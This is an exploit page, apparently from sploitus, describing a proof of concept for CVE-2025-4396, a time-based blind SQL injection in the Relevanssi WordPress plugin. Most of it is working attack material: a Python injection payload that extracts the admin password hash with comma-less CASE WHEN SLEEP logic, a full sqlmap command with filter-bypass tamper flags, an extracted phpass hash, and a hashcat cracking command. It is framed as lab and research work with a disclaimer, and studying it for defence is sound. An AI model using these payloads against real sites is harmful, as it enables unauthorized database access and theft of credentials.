## https://sploitus.com/exploit?id=C787EFDE-5F49-5A43-9493-BD0BD9DC5EB2
# CVE-2025-4396 Exploit: Relevanssi SQL Injection (Time-Based)
A specialized proof-of-concept for exploiting time-based blind SQL injection in the Relevanssi WordPress plugin. This implementation specifically addresses environments where **commas are filtered** and the database exhibits **greedy sleep** behavior.
## Background
In certain hardened environments (like the DVWP lab), standard SQL injection payloads fail because:
1. **Comma Stripping:** The application filters commas, breaking standard `SUBSTR(str, pos, len)` and `IF(cond, true, false)` functions.
2. **Greedy Sleep:** MySQL sometimes executes `SLEEP()` functions before evaluating the full mathematical expression, leading to false positives.
## Manual Exploit (`asy.py`)
The included asynchronous Python script provides a surgical extraction method that avoids automated tool overhead and bypasses filters using `CASE WHEN` logic and comma-less SQL syntax.
### Features
- **Async Data Retrieval:** Uses `aiohttp` for non-blocking I/O.
- **Comma-less Payloads:** Uses `SUBSTR(str FROM pos FOR len)` syntax.
- **Non-Greedy Logic:** Implements `CASE WHEN` to ensure `SLEEP()` only executes on `TRUE` hits.
```python
# Core Injection Logic
condition = f"ASCII(SUBSTR((SELECT user_pass FROM wp_users WHERE ID=1) FROM {pos} FOR 1))>{mid}"
injection = f"1*(SELECT CASE WHEN ({condition}) THEN SLEEP(3) ELSE 1 END)"
SQLMap Implementation
Automated discovery can be achieved in this environment by utilizing specific tamper scripts and configuration flags to accommodate the filtering constraints.
Command
Bash
python3 sqlmap.py -u "http://localhost:31337/?s=test&cats=1*" \\
--tamper=commalessmid,if2case,between \\
--technique=T \\
--dbms=MySQL \\
--no-cast \\
--batch \\
--threads=1 \\
--dbs
Key Flags Breakdown
--tamper=commalessmid,if2case: Critical for rewriting standard payloads into comma-free SQL and replacing IF() with CASE.
--technique=T: Restricts the engine to Time-based blind injection.
--no-cast: Prevents SQLMap from wrapping queries in CAST(), which often introduces forbidden commas.
--threads=1: Essential for timing accuracy; prevents concurrent requests from causing overlapping sleep delays that jumble the extracted characters.
Lab Findings
Target User: admin (ID=1)
Extracted Hash: $P$BCY2E.3WCjhl9fhyM5UlDBE4wyOFwL/
Hash Algorithm: phpass (Standard WordPress)
Cracking Command:
Bash
hashcat -m 400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Disclaimer: This repository is intended for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal.
"""